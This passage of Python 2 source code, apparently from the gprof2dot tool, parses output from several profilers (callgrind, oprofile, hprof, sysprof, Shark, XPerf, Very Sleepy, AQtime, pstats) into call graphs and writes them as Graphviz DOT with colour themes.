self.parse_part()
# compute derived data
self.profile.validate()
self.profile.find_cycles()
self.profile.ratio(TIME_RATIO, SAMPLES)
self.profile.call_ratios(CALLS)
self.profile.integrate(TOTAL_TIME_RATIO, TIME_RATIO)
return self.profile
def parse_part(self):
while self.parse_header_line():
pass
while self.parse_body_line():
pass
if not self.eof() and False:
sys.stderr.write('warning: line %u: unexpected line\n' % self.line_no)
sys.stderr.write('%s\n' % self.lookahead())
return True
def parse_header_line(self):
return \
self.parse_empty() or \
self.parse_comment() or \
self.parse_part_detail() or \
self.parse_description() or \
self.parse_event_specification() or \
self.parse_cost_line_def() or \
self.parse_cost_summary()
_detail_keys = set(('cmd', 'pid', 'thread', 'part'))
def parse_part_detail(self):
return self.parse_keys(self._detail_keys)
def parse_description(self):
return self.parse_key('desc') is not None
def parse_event_specification(self):
event = self.parse_key('event')
if event is None:
return False
return True
def parse_cost_line_def(self):
pair = self.parse_keys(('events', 'positions'))
if pair is None:
return False
key, value = pair
items = value.split()
if key == 'events':
self.num_events = len(items)
self.cost_events = items
if key == 'positions':
self.num_positions = len(items)
self.cost_positions = items
self.last_positions = [0]*self.num_positions
return True
def parse_cost_summary(self):
pair = self.parse_keys(('summary', 'totals'))
if pair is None:
return False
return True
def parse_body_line(self):
return \
self.parse_empty() or \
self.parse_comment() or \
self.parse_cost_line() or \
self.parse_position_spec() or \
self.parse_association_spec()
__subpos_re = r'(0x[0-9a-fA-F]+|\d+|\+\d+|-\d+|\*)'
_cost_re = re.compile(r'^' +
__subpos_re + r'( +' + __subpos_re + r')*' +
r'( +\d+)*' +
'$')
def parse_cost_line(self, calls=None):
line = self.lookahead().rstrip()
mo = self._cost_re.match(line)
if not mo:
return False
function = self.get_function()
values = line.split()
assert len(values) <= self.num_positions + self.num_events
positions = values[0 : self.num_positions]
events = values[self.num_positions : ]
events += ['0']*(self.num_events - len(events))
for i in range(self.num_positions):
position = positions[i]
if position == '*':
position = self.last_positions[i]
elif position[0] in '-+':
position = self.last_positions[i] + int(position)
elif position.startswith('0x'):
position = int(position, 16)
else:
position = int(position)
self.last_positions[i] = position
events = map(float, events)
if calls is None:
function[SAMPLES] += events[0]
self.profile[SAMPLES] += events[0]
else:
callee = self.get_callee()
callee.called += calls
try:
call = function.calls[callee.id]
except KeyError:
call = Call(callee.id)
call[CALLS] = calls
call[SAMPLES] = events[0]
function.add_call(call)
else:
call[CALLS] += calls
call[SAMPLES] += events[0]
self.consume()
return True
def parse_association_spec(self):
line = self.lookahead()
if not line.startswith('calls='):
return False
_, values = line.split('=', 1)
values = values.strip().split()
calls = int(values[0])
call_position = values[1:]
self.consume()
self.parse_cost_line(calls)
return True
_position_re = re.compile('^(?P<position>[cj]?(?:ob|fl|fi|fe|fn))=\s*(?:\((?P<id>\d+)\))?(?:\s*(?P<name>.+))?')
_position_table_map = {
'ob': 'ob',
'fl': 'fl',
'fi': 'fl',
'fe': 'fl',
'fn': 'fn',
'cob': 'ob',
'cfl': 'fl',
'cfi': 'fl',
'cfe': 'fl',
'cfn': 'fn',
'jfi': 'fl',
}
_position_map = {
'ob': 'ob',
'fl': 'fl',
'fi': 'fl',
'fe': 'fl',
'fn': 'fn',
'cob': 'cob',
'cfl': 'cfl',
'cfi': 'cfl',
'cfe': 'cfl',
'cfn': 'cfn',
'jfi': 'jfi',
}
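# The two tables above normalize callgrind position keys: every file-like key
# ('fl', 'fi', 'fe' and the callee-side 'c*'/'jfi' variants) shares one name
# table, while _position_map keeps caller positions ('ob'/'fl'/'fn') separate
# from callee positions ('cob'/'cfl'/'cfn') so get_function() and get_callee()
# can look them up independently.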
def parse_position_spec(self):
line = self.lookahead()
if line.startswith('jump=') or line.startswith('jcnd='):
self.consume()
return True
mo = self._position_re.match(line)
if not mo:
return False
position, id, name = mo.groups()
if id:
table = self._position_table_map[position]
if name:
self.position_ids[(table, id)] = name
else:
name = self.position_ids.get((table, id), '')
self.positions[self._position_map[position]] = name
self.consume()
return True
def parse_empty(self):
if self.eof():
return False
line = self.lookahead()
if line.strip():
return False
self.consume()
return True
def parse_comment(self):
line = self.lookahead()
if not line.startswith('#'):
return False
self.consume()
return True
_key_re = re.compile(r'^(\w+):')
def parse_key(self, key):
pair = self.parse_keys((key,))
if not pair:
return None
key, value = pair
return value
def parse_keys(self, keys):
line = self.lookahead()
mo = self._key_re.match(line)
if not mo:
return None
key, value = line.split(':', 1)
if key not in keys:
return None
value = value.strip()
self.consume()
return key, value
def make_function(self, module, filename, name):
# FIXME: module and filename are not being tracked reliably
#id = '|'.join((module, filename, name))
id = name
try:
function = self.profile.functions[id]
except KeyError:
function = Function(id, name)
function[SAMPLES] = 0
function.called = 0
self.profile.add_function(function)
return function
def get_function(self):
module = self.positions.get('ob', '')
filename = self.positions.get('fl', '')
function = self.positions.get('fn', '')
return self.make_function(module, filename, function)
def get_callee(self):
module = self.positions.get('cob', '')
filename = self.positions.get('cfi', '')
function = self.positions.get('cfn', '')
return self.make_function(module, filename, function)
class OprofileParser(LineParser):
"""Parser for oprofile callgraph output.
See also:
- http://oprofile.sourceforge.net/doc/opreport.html#opreport-callgraph
"""
_fields_re = {
'samples': r'(\d+)',
'%': r'(\S+)',
'linenr info': r'(?P<source>\(no location information\)|\S+:\d+)',
'image name': r'(?P<image>\S+(?:\s\(tgid:[^)]*\))?)',
'app name': r'(?P<application>\S+)',
'symbol name': r'(?P<symbol>\(no symbols\)|.+?)',
}
def __init__(self, infile):
LineParser.__init__(self, infile)
self.entries = {}
self.entry_re = None
def add_entry(self, callers, function, callees):
try:
entry = self.entries[function.id]
except KeyError:
self.entries[function.id] = (callers, function, callees)
else:
callers_total, function_total, callees_total = entry
self.update_subentries_dict(callers_total, callers)
function_total.samples += function.samples
self.update_subentries_dict(callees_total, callees)
def update_subentries_dict(self, totals, partials):
for partial in partials.itervalues():
try:
total = totals[partial.id]
except KeyError:
totals[partial.id] = partial
else:
total.samples += partial.samples
def parse(self):
# read lookahead
self.readline()
self.parse_header()
while self.lookahead():
self.parse_entry()
profile = Profile()
reverse_call_samples = {}
# populate the profile
profile[SAMPLES] = 0
for _callers, _function, _callees in self.entries.itervalues():
function = Function(_function.id, _function.name)
function[SAMPLES] = _function.samples
profile.add_function(function)
profile[SAMPLES] += _function.samples
if _function.application:
function.process = os.path.basename(_function.application)
if _function.image:
function.module = os.path.basename(_function.image)
total_callee_samples = 0
for _callee in _callees.itervalues():
total_callee_samples += _callee.samples
for _callee in _callees.itervalues():
if not _callee.self:
call = Call(_callee.id)
call[SAMPLES2] = _callee.samples
function.add_call(call)
# compute derived data
profile.validate()
profile.find_cycles()
profile.ratio(TIME_RATIO, SAMPLES)
profile.call_ratios(SAMPLES2)
profile.integrate(TOTAL_TIME_RATIO, TIME_RATIO)
return profile
def parse_header(self):
while not self.match_header():
self.consume()
line = self.lookahead()
fields = re.split(r'\s\s+', line)
entry_re = r'^\s*' + r'\s+'.join([self._fields_re[field] for field in fields]) + r'(?P<self>\s+\[self\])?$'
self.entry_re = re.compile(entry_re)
self.skip_separator()
def parse_entry(self):
callers = self.parse_subentries()
if self.match_primary():
function = self.parse_subentry()
if function is not None:
callees = self.parse_subentries()
self.add_entry(callers, function, callees)
self.skip_separator()
def parse_subentries(self):
subentries = {}
while self.match_secondary():
subentry = self.parse_subentry()
subentries[subentry.id] = subentry
return subentries
def parse_subentry(self):
entry = Struct()
line = self.consume()
mo = self.entry_re.match(line)
if not mo:
raise ParseError('failed to parse', line)
fields = mo.groupdict()
entry.samples = int(mo.group(1))
if 'source' in fields and fields['source'] != '(no location information)':
source = fields['source']
filename, lineno = source.split(':')
entry.filename = filename
entry.lineno = int(lineno)
else:
source = ''
entry.filename = None
entry.lineno = None
entry.image = fields.get('image', '')
entry.application = fields.get('application', '')
if 'symbol' in fields and fields['symbol'] != '(no symbols)':
entry.symbol = fields['symbol']
else:
entry.symbol = ''
if entry.symbol.startswith('"') and entry.symbol.endswith('"'):
entry.symbol = entry.symbol[1:-1]
entry.id = ':'.join((entry.application, entry.image, source, entry.symbol))
entry.self = fields.get('self', None) != None
if entry.self:
entry.id += ':self'
if entry.symbol:
entry.name = entry.symbol
else:
entry.name = entry.image
return entry
def skip_separator(self):
while not self.match_separator():
self.consume()
self.consume()
def match_header(self):
line = self.lookahead()
return line.startswith('samples')
def match_separator(self):
line = self.lookahead()
return line == '-'*len(line)
def match_primary(self):
line = self.lookahead()
return not line[:1].isspace()
def match_secondary(self):
line = self.lookahead()
return line[:1].isspace()
class HProfParser(LineParser):
"""Parser for java hprof output
See also:
- http://java.sun.com/developer/technicalArticles/Programming/HPROF.html
"""
trace_re = re.compile(r'\t(.*)\((.*):(.*)\)')
trace_id_re = re.compile(r'^TRACE (\d+):$')
def __init__(self, infile):
LineParser.__init__(self, infile)
self.traces = {}
self.samples = {}
def parse(self):
# read lookahead
self.readline()
while not self.lookahead().startswith('------'): self.consume()
while not self.lookahead().startswith('TRACE '): self.consume()
self.parse_traces()
while not self.lookahead().startswith('CPU'):
self.consume()
self.parse_samples()
# populate the profile
profile = Profile()
profile[SAMPLES] = 0
functions = {}
# build up callgraph
for id, trace in self.traces.iteritems():
if not id in self.samples: continue
mtime = self.samples[id][0]
last = None
for func, file, line in trace:
if not func in functions:
function = Function(func, func)
function[SAMPLES] = 0
profile.add_function(function)
functions[func] = function
function = functions[func]
# allocate time to the deepest method in the trace
if not last:
function[SAMPLES] += mtime
profile[SAMPLES] += mtime
else:
c = function.get_call(last)
c[SAMPLES2] += mtime
last = func
# compute derived data
profile.validate()
profile.find_cycles()
profile.ratio(TIME_RATIO, SAMPLES)
profile.call_ratios(SAMPLES2)
profile.integrate(TOTAL_TIME_RATIO, TIME_RATIO)
return profile
def parse_traces(self):
while self.lookahead().startswith('TRACE '):
self.parse_trace()
def parse_trace(self):
l = self.consume()
mo = self.trace_id_re.match(l)
tid = mo.group(1)
last = None
trace = []
while self.lookahead().startswith('\t'):
l = self.consume()
match = self.trace_re.search(l)
if not match:
#sys.stderr.write('Invalid line: %s\n' % l)
break
else:
function_name, file, line = match.groups()
trace += [(function_name, file, line)]
self.traces[int(tid)] = trace
def parse_samples(self):
self.consume()
self.consume()
while not self.lookahead().startswith('CPU'):
rank, percent_self, percent_accum, count, traceid, method = self.lookahead().split()
self.samples[int(traceid)] = (int(count), method)
self.consume()
class SysprofParser(XmlParser):
def __init__(self, stream):
XmlParser.__init__(self, stream)
def parse(self):
objects = {}
nodes = {}
self.element_start('profile')
while self.token.type == XML_ELEMENT_START:
if self.token.name_or_data == 'objects':
assert not objects
objects = self.parse_items('objects')
elif self.token.name_or_data == 'nodes':
assert not nodes
nodes = self.parse_items('nodes')
else:
self.parse_value(self.token.name_or_data)
self.element_end('profile')
return self.build_profile(objects, nodes)
def parse_items(self, name):
assert name[-1] == 's'
items = {}
self.element_start(name)
while self.token.type == XML_ELEMENT_START:
id, values = self.parse_item(name[:-1])
assert id not in items
items[id] = values
self.element_end(name)
return items
def parse_item(self, name):
attrs = self.element_start(name)
id = int(attrs['id'])
values = self.parse_values()
self.element_end(name)
return id, values
def parse_values(self):
values = {}
while self.token.type == XML_ELEMENT_START:
name = self.token.name_or_data
value = self.parse_value(name)
assert name not in values
values[name] = value
return values
def parse_value(self, tag):
self.element_start(tag)
value = self.character_data()
self.element_end(tag)
if value.isdigit():
return int(value)
if value.startswith('"') and value.endswith('"'):
return value[1:-1]
return value
def build_profile(self, objects, nodes):
profile = Profile()
profile[SAMPLES] = 0
for id, object in objects.iteritems():
# Ignore fake objects (process names, modules, "Everything", "kernel", etc.)
if object['self'] == 0:
continue
function = Function(id, object['name'])
function[SAMPLES] = object['self']
profile.add_function(function)
profile[SAMPLES] += function[SAMPLES]
for id, node in nodes.iteritems():
# Ignore fake calls
if node['self'] == 0:
continue
# Find a non-ignored parent
parent_id = node['parent']
while parent_id != 0:
parent = nodes[parent_id]
caller_id = parent['object']
if objects[caller_id]['self'] != 0:
break
parent_id = parent['parent']
if parent_id == 0:
continue
callee_id = node['object']
assert objects[caller_id]['self']
assert objects[callee_id]['self']
function = profile.functions[caller_id]
samples = node['self']
try:
call = function.calls[callee_id]
except KeyError:
call = Call(callee_id)
call[SAMPLES2] = samples
function.add_call(call)
else:
call[SAMPLES2] += samples
# Compute derived events
profile.validate()
profile.find_cycles()
profile.ratio(TIME_RATIO, SAMPLES)
profile.call_ratios(SAMPLES2)
profile.integrate(TOTAL_TIME_RATIO, TIME_RATIO)
return profile
class SharkParser(LineParser):
"""Parser for MacOSX Shark output.
Author: tom@dbservice.com
"""
def __init__(self, infile):
LineParser.__init__(self, infile)
self.stack = []
self.entries = {}
def add_entry(self, function):
try:
entry = self.entries[function.id]
except KeyError:
self.entries[function.id] = (function, { })
else:
function_total, callees_total = entry
function_total.samples += function.samples
def add_callee(self, function, callee):
func, callees = self.entries[function.id]
try:
entry = callees[callee.id]
except KeyError:
callees[callee.id] = callee
else:
entry.samples += callee.samples
def parse(self):
self.readline()
self.readline()
self.readline()
self.readline()
match = re.compile(r'(?P<prefix>[|+ ]*)(?P<samples>\d+), (?P<symbol>[^,]+), (?P<image>.*)')
while self.lookahead():
line = self.consume()
mo = match.match(line)
if not mo:
raise ParseError('failed to parse', line)
fields = mo.groupdict()
prefix = len(fields.get('prefix', 0)) / 2 - 1
symbol = str(fields.get('symbol', 0))
image = str(fields.get('image', 0))
entry = Struct()
entry.id = ':'.join([symbol, image])
entry.samples = int(fields.get('samples', 0))
entry.name = symbol
entry.image = image
# adjust the callstack
if prefix < len(self.stack):
del self.stack[prefix:]
if prefix == len(self.stack):
self.stack.append(entry)
# if the callstack already has an entry, it's this function's caller
if prefix > 0:
self.add_callee(self.stack[prefix - 1], entry)
self.add_entry(entry)
profile = Profile()
profile[SAMPLES] = 0
for _function, _callees in self.entries.itervalues():
function = Function(_function.id, _function.name)
function[SAMPLES] = _function.samples
profile.add_function(function)
profile[SAMPLES] += _function.samples
if _function.image:
function.module = os.path.basename(_function.image)
for _callee in _callees.itervalues():
call = Call(_callee.id)
call[SAMPLES] = _callee.samples
function.add_call(call)
# compute derived data
profile.validate()
profile.find_cycles()
profile.ratio(TIME_RATIO, SAMPLES)
profile.call_ratios(SAMPLES)
profile.integrate(TOTAL_TIME_RATIO, TIME_RATIO)
return profile
class XPerfParser(Parser):
"""Parser for CSVs generted by XPerf, from Microsoft Windows Performance Tools.
"""
def __init__(self, stream):
Parser.__init__(self)
self.stream = stream
self.profile = Profile()
self.profile[SAMPLES] = 0
self.column = {}
def parse(self):
import csv
reader = csv.reader(
self.stream,
delimiter = ',',
quotechar = None,
escapechar = None,
doublequote = False,
skipinitialspace = True,
lineterminator = '\r\n',
quoting = csv.QUOTE_NONE)
it = iter(reader)
row = reader.next()
self.parse_header(row)
for row in it:
self.parse_row(row)
# compute derived data
self.profile.validate()
self.profile.find_cycles()
self.profile.ratio(TIME_RATIO, SAMPLES)
self.profile.call_ratios(SAMPLES2)
self.profile.integrate(TOTAL_TIME_RATIO, TIME_RATIO)
return self.profile
def parse_header(self, row):
for column in range(len(row)):
name = row[column]
assert name not in self.column
self.column[name] = column
def parse_row(self, row):
fields = {}
for name, column in self.column.iteritems():
value = row[column]
for factory in int, float:
try:
value = factory(value)
except ValueError:
pass
else:
break
fields[name] = value
process = fields['Process Name']
symbol = fields['Module'] + '!' + fields['Function']
weight = fields['Weight']
count = fields['Count']
function = self.get_function(process, symbol)
function[SAMPLES] += weight * count
self.profile[SAMPLES] += weight * count
stack = fields['Stack']
if stack != '?':
stack = stack.split('/')
assert stack[0] == '[Root]'
if stack[-1] != symbol:
# XXX: in some cases the sampled function does not appear in the stack
stack.append(symbol)
caller = None
for symbol in stack[1:]:
callee = self.get_function(process, symbol)
if caller is not None:
try:
call = caller.calls[callee.id]
except KeyError:
call = Call(callee.id)
call[SAMPLES2] = count
caller.add_call(call)
else:
call[SAMPLES2] += count
caller = callee
def get_function(self, process, symbol):
function_id = process + '!' + symbol
try:
function = self.profile.functions[function_id]
except KeyError:
module, name = symbol.split('!', 1)
function = Function(function_id, name)
function.process = process
function.module = module
function[SAMPLES] = 0
self.profile.add_function(function)
return function
class SleepyParser(Parser):
"""Parser for GNU gprof output.
See also:
- http://www.codersnotes.com/sleepy/
- http://sleepygraph.sourceforge.net/
"""
def __init__(self, filename):
Parser.__init__(self)
from zipfile import ZipFile
self.database = ZipFile(filename)
self.symbols = {}
self.calls = {}
self.profile = Profile()
_symbol_re = re.compile(
r'^(?P<id>\w+)' +
r'\s+"(?P<module>[^"]*)"' +
r'\s+"(?P<procname>[^"]*)"' +
r'\s+"(?P<sourcefile>[^"]*)"' +
r'\s+(?P<sourceline>\d+)$'
)
def parse_symbols(self):
lines = self.database.read('symbols.txt').splitlines()
for line in lines:
mo = self._symbol_re.match(line)
if mo:
symbol_id, module, procname, sourcefile, sourceline = mo.groups()
function_id = ':'.join([module, procname])
try:
function = self.profile.functions[function_id]
except KeyError:
function = Function(function_id, procname)
function.module = module
function[SAMPLES] = 0
self.profile.add_function(function)
self.symbols[symbol_id] = function
def parse_callstacks(self):
lines = self.database.read("callstacks.txt").splitlines()
for line in lines:
fields = line.split()
samples = int(fields[0])
callstack = fields[1:]
callstack = [self.symbols[symbol_id] for symbol_id in callstack]
callee = callstack[0]
callee[SAMPLES] += samples
self.profile[SAMPLES] += samples
for caller in callstack[1:]:
try:
call = caller.calls[callee.id]
except KeyError:
call = Call(callee.id)
call[SAMPLES2] = samples
caller.add_call(call)
else:
call[SAMPLES2] += samples
callee = caller
def parse(self):
profile = self.profile
profile[SAMPLES] = 0
self.parse_symbols()
self.parse_callstacks()
# Compute derived events
profile.validate()
profile.find_cycles()
profile.ratio(TIME_RATIO, SAMPLES)
profile.call_ratios(SAMPLES2)
profile.integrate(TOTAL_TIME_RATIO, TIME_RATIO)
return profile
class AQtimeTable:
def __init__(self, name, fields):
self.name = name
self.fields = fields
self.field_column = {}
for column in range(len(fields)):
self.field_column[fields[column]] = column
self.rows = []
def __len__(self):
return len(self.rows)
def __iter__(self):
for values, children in self.rows:
fields = {}
for name, value in zip(self.fields, values):
fields[name] = value
children = dict([(child.name, child) for child in children])
yield fields, children
raise StopIteration
def add_row(self, values, children=()):
self.rows.append((values, children))
class AQtimeParser(XmlParser):
def __init__(self, stream):
XmlParser.__init__(self, stream)
self.tables = {}
def parse(self):
self.element_start('AQtime_Results')
self.parse_headers()
results = self.parse_results()
self.element_end('AQtime_Results')
return self.build_profile(results)
def parse_headers(self):
self.element_start('HEADERS')
while self.token.type == XML_ELEMENT_START:
self.parse_table_header()
self.element_end('HEADERS')
def parse_table_header(self):
attrs = self.element_start('TABLE_HEADER')
name = attrs['NAME']
id = int(attrs['ID'])
field_types = []
field_names = []
while self.token.type == XML_ELEMENT_START:
field_type, field_name = self.parse_table_field()
field_types.append(field_type)
field_names.append(field_name)
self.element_end('TABLE_HEADER')
self.tables[id] = name, field_types, field_names
def parse_table_field(self):
attrs = self.element_start('TABLE_FIELD')
type = attrs['TYPE']
name = self.character_data()
self.element_end('TABLE_FIELD')
return type, name
def parse_results(self):
self.element_start('RESULTS')
table = self.parse_data()
self.element_end('RESULTS')
return table
def parse_data(self):
rows = []
attrs = self.element_start('DATA')
table_id = int(attrs['TABLE_ID'])
table_name, field_types, field_names = self.tables[table_id]
table = AQtimeTable(table_name, field_names)
while self.token.type == XML_ELEMENT_START:
row, children = self.parse_row(field_types)
table.add_row(row, children)
self.element_end('DATA')
return table
def parse_row(self, field_types):
row = [None]*len(field_types)
children = []
self.element_start('ROW')
while self.token.type == XML_ELEMENT_START:
if self.token.name_or_data == 'FIELD':
field_id, field_value = self.parse_field(field_types)
row[field_id] = field_value
elif self.token.name_or_data == 'CHILDREN':
children = self.parse_children()
else:
raise XmlTokenMismatch("<FIELD ...> or <CHILDREN ...>", self.token)
self.element_end('ROW')
return row, children
def parse_field(self, field_types):
attrs = self.element_start('FIELD')
id = int(attrs['ID'])
type = field_types[id]
value = self.character_data()
if type == 'Integer':
value = int(value)
elif type == 'Float':
value = float(value)
elif type == 'Address':
value = int(value)
elif type == 'String':
pass
else:
assert False
self.element_end('FIELD')
return id, value
def parse_children(self):
children = []
self.element_start('CHILDREN')
while self.token.type == XML_ELEMENT_START:
table = self.parse_data()
assert table.name not in children
children.append(table)
self.element_end('CHILDREN')
return children
def build_profile(self, results):
assert results.name == 'Routines'
profile = Profile()
profile[TIME] = 0.0
for fields, tables in results:
function = self.build_function(fields)
children = tables['Children']
for fields, _ in children:
call = self.build_call(fields)
function.add_call(call)
profile.add_function(function)
profile[TIME] = profile[TIME] + function[TIME]
profile[TOTAL_TIME] = profile[TIME]
profile.ratio(TOTAL_TIME_RATIO, TOTAL_TIME)
return profile
def build_function(self, fields):
function = Function(self.build_id(fields), self.build_name(fields))
function[TIME] = fields['Time']
function[TOTAL_TIME] = fields['Time with Children']
#function[TIME_RATIO] = fields['% Time']/100.0
#function[TOTAL_TIME_RATIO] = fields['% with Children']/100.0
return function
def build_call(self, fields):
call = Call(self.build_id(fields))
call[TIME] = fields['Time']
call[TOTAL_TIME] = fields['Time with Children']
#call[TIME_RATIO] = fields['% Time']/100.0
#call[TOTAL_TIME_RATIO] = fields['% with Children']/100.0
return call
def build_id(self, fields):
return ':'.join([fields['Module Name'], fields['Unit Name'], fields['Routine Name']])
def build_name(self, fields):
# TODO: use more fields
return fields['Routine Name']
class PstatsParser:
"""Parser python profiling statistics saved with te pstats module."""
def __init__(self, *filename):
import pstats
try:
self.stats = pstats.Stats(*filename)
except ValueError:
import hotshot.stats
self.stats = hotshot.stats.load(filename[0])
self.profile = Profile()
self.function_ids = {}
def get_function_name(self, (filename, line, name)):
module = os.path.splitext(filename)[0]
module = os.path.basename(module)
return "%s:%d:%s" % (module, line, name)
def get_function(self, key):
try:
id = self.function_ids[key]
except KeyError:
id = len(self.function_ids)
name = self.get_function_name(key)
function = Function(id, name)
self.profile.functions[id] = function
self.function_ids[key] = id
else:
function = self.profile.functions[id]
return function
def parse(self):
self.profile[TIME] = 0.0
self.profile[TOTAL_TIME] = self.stats.total_tt
for fn, (cc, nc, tt, ct, callers) in self.stats.stats.iteritems():
callee = self.get_function(fn)
callee.called = nc
callee[TOTAL_TIME] = ct
callee[TIME] = tt
self.profile[TIME] += tt
self.profile[TOTAL_TIME] = max(self.profile[TOTAL_TIME], ct)
for fn, value in callers.iteritems():
caller = self.get_function(fn)
call = Call(callee.id)
if isinstance(value, tuple):
for i in xrange(0, len(value), 4):
nc, cc, tt, ct = value[i:i+4]
if CALLS in call:
call[CALLS] += cc
else:
call[CALLS] = cc
if TOTAL_TIME in call:
call[TOTAL_TIME] += ct
else:
call[TOTAL_TIME] = ct
else:
call[CALLS] = value
call[TOTAL_TIME] = ratio(value, nc)*ct
caller.add_call(call)
#self.stats.print_stats()
#self.stats.print_callees()
# Compute derived events
self.profile.validate()
self.profile.ratio(TIME_RATIO, TIME)
self.profile.ratio(TOTAL_TIME_RATIO, TOTAL_TIME)
return self.profile
class Theme:
def __init__(self,
bgcolor = (0.0, 0.0, 1.0),
mincolor = (0.0, 0.0, 0.0),
maxcolor = (0.0, 0.0, 1.0),
fontname = "Arial",
minfontsize = 10.0,
maxfontsize = 10.0,
minpenwidth = 0.5,
maxpenwidth = 4.0,
gamma = 2.2,
skew = 1.0):
self.bgcolor = bgcolor
self.mincolor = mincolor
self.maxcolor = maxcolor
self.fontname = fontname
self.minfontsize = minfontsize
self.maxfontsize = maxfontsize
self.minpenwidth = minpenwidth
self.maxpenwidth = maxpenwidth
self.gamma = gamma
self.skew = skew
def graph_bgcolor(self):
return self.hsl_to_rgb(*self.bgcolor)
def graph_fontname(self):
return self.fontname
def graph_fontsize(self):
return self.minfontsize
def node_bgcolor(self, weight):
return self.color(weight)
def node_fgcolor(self, weight):
return self.graph_bgcolor()
def node_fontsize(self, weight):
return self.fontsize(weight)
def edge_color(self, weight):
return self.color(weight)
def edge_fontsize(self, weight):
return self.fontsize(weight)
def edge_penwidth(self, weight):
return max(weight*self.maxpenwidth, self.minpenwidth)
def edge_arrowsize(self, weight):
return 0.5 * math.sqrt(self.edge_penwidth(weight))
def fontsize(self, weight):
return max(weight**2 * self.maxfontsize, self.minfontsize)
def color(self, weight):
weight = min(max(weight, 0.0), 1.0)
hmin, smin, lmin = self.mincolor
hmax, smax, lmax = self.maxcolor
if self.skew < 0:
raise ValueError("Skew must be greater than 0")
elif self.skew == 1.0:
h = hmin + weight*(hmax - hmin)
s = smin + weight*(smax - smin)
l = lmin + weight*(lmax - lmin)
else:
base = self.skew
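# Exponential interpolation: (base**w - 1)/(base - 1) maps w in [0, 1] onto
# [0, 1] and tends to the plain linear interpolation above as base approaches 1.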
h = hmin + ((hmax-hmin)*(-1.0 + (base ** weight)) / (base - 1.0))
s = smin + ((smax-smin)*(-1.0 + (base ** weight)) / (base - 1.0))
l = lmin + ((lmax-lmin)*(-1.0 + (base ** weight)) / (base - 1.0))
return self.hsl_to_rgb(h, s, l)
def hsl_to_rgb(self, h, s, l):
"""Convert a color from HSL color-model to RGB.
See also:
- http://www.w3.org/TR/css3-color/#hsl-color
"""
h = h % 1.0
s = min(max(s, 0.0), 1.0)
l = min(max(l, 0.0), 1.0)
if l <= 0.5:
m2 = l*(s + 1.0)
else:
m2 = l + s - l*s
m1 = l*2.0 - m2
r = self._hue_to_rgb(m1, m2, h + 1.0/3.0)
g = self._hue_to_rgb(m1, m2, h)
b = self._hue_to_rgb(m1, m2, h - 1.0/3.0)
# Apply gamma correction
r **= self.gamma
g **= self.gamma
b **= self.gamma
return (r, g, b)
def _hue_to_rgb(self, m1, m2, h):
if h < 0.0:
h += 1.0
elif h > 1.0:
h -= 1.0
if h*6 < 1.0:
return m1 + (m2 - m1)*h*6.0
elif h*2 < 1.0:
return m2
elif h*3 < 2.0:
return m1 + (m2 - m1)*(2.0/3.0 - h)*6.0
else:
return m1
TEMPERATURE_COLORMAP = Theme(
mincolor = (2.0/3.0, 0.80, 0.25), # dark blue
maxcolor = (0.0, 1.0, 0.5), # saturated red
gamma = 1.0
)
PINK_COLORMAP = Theme(
mincolor = (0.0, 1.0, 0.90), # pink
maxcolor = (0.0, 1.0, 0.5), # saturated red
)
GRAY_COLORMAP = Theme(
mincolor = (0.0, 0.0, 0.85), # light gray
maxcolor = (0.0, 0.0, 0.0), # black
)
BW_COLORMAP = Theme(
minfontsize = 8.0,
maxfontsize = 24.0,
mincolor = (0.0, 0.0, 0.0), # black
maxcolor = (0.0, 0.0, 0.0), # black
minpenwidth = 0.1,
maxpenwidth = 8.0,
)
class DotWriter:
"""Writer for the DOT language.
See also:
- "The DOT Language" specification
http://www.graphviz.org/doc/info/lang.html
"""
def __init__(self, fp):
self.fp = fp
def graph(self, profile, theme):
self.begin_graph()
fontname = theme.graph_fontname()
self.attr('graph', fontname=fontname, ranksep=0.25, nodesep=0.125)
self.attr('node', fontname=fontname, shape="box", style="filled", fontcolor="white", width=0, height=0)
self.attr('edge', fontname=fontname)
for function in profile.functions.itervalues():
labels = []
if function.process is not None:
labels.append(function.process)
if function.module is not None:
labels.append(function.module)
labels.append(function.name)
for event in TOTAL_TIME_RATIO, TIME_RATIO:
if event in function.events:
label = event.format(function[event])
labels.append(label)
if function.called is not None:
labels.append(u"%u\xd7" % (function.called,))
if function.weight is not None:
weight = function.weight
else:
weight = 0.0
label = '\n'.join(labels)
self.node(function.id,
label = label,
color = self.color(theme.node_bgcolor(weight)),
fontcolor = self.color(theme.node_fgcolor(weight)),
fontsize = "%.2f" % theme.node_fontsize(weight),
)
for call in function.calls.itervalues():
callee = profile.functions[call.callee_id]
labels = []
for event in TOTAL_TIME_RATIO, CALLS:
if event in call.events:
label = event.format(call[event])
labels.append(label)
if call.weight is not None:
weight = call.weight
elif callee.weight is not None:
weight = callee.weight
else:
weight = 0.0
label = '\n'.join(labels)
self.edge(function.id, call.callee_id,
label = label,
color = self.color(theme.edge_color(weight)),
fontcolor = self.color(theme.edge_color(weight)),
fontsize = "%.2f" % theme.edge_fontsize(weight),
penwidth = "%.2f" % theme.edge_penwidth(weight),
labeldistance = "%.2f" % theme.edge_penwidth(weight),
arrowsize = "%.2f" % theme.edge_arrowsize(weight),
)
self.end_graph()
def begin_graph(self):
self.write('digraph {\n')
def end_graph(self):
self.write('}\n')
def attr(self, what, **attrs):
self.write("\t")
self.write(what)
self.attr_list(attrs)
self.write(";\n")
def node(self, node, **attrs):
self.write("\t")
self.id(node)
self.attr_list(attrs)
self.write(";\n")
def edge(self, src, dst, **attrs):
self.write("\t")
self.id(src)
self.write(" -> ")
self.id(dst)
self.attr_list(attrs)
self.write(";\n")
def attr_list(self, attrs):
if not attrs:
return
self.write(' [')
first = True
for name, value in attrs.iteritems():
if first:
first = False
else:
self.write(", ")
self.id(name)
self.write('=')
self.id(value)
self.write(']')
def id(self, id):
if isinstance(id, (int, float)):
s = str(id)
elif isinstance(id, basestring):
if id.isalnum() and not id.startswith('0x'):
s = id
else:
s = self.escape(id)
else:
raise TypeError
self.write(s)
def color(self, (r, g, b)):
def float2int(f):
if f <= 0.0:
return 0
if f >= 1.0:
return 255
return int(255.0*f + 0.5)
return "#" + "".join(["%02x" % float2int(c) for c in (r, g, b)])
def escape(self, s):
s = s.encode('utf-8')
s = s.replace('\\', r'\\')
s = s.replace('\n', r'\n')
s = s.replace('\t', r'\t')
s = s.replace('"', r'\"')
return '"' + s + '"'
def write(self, s):
self.fp.write(s)
class Main:
"""Main program."""
themes = {
"color": TEMPERATURE_COLORMAP,
"pink": PINK_COLORMAP,
"gray": GRAY_COLORMAP,
"bw": BW_COLORMAP,
}
def main(self):
"""Main program."""
parser = optparse.OptionParser(
usage="\n\t%prog [options] [file] ...",
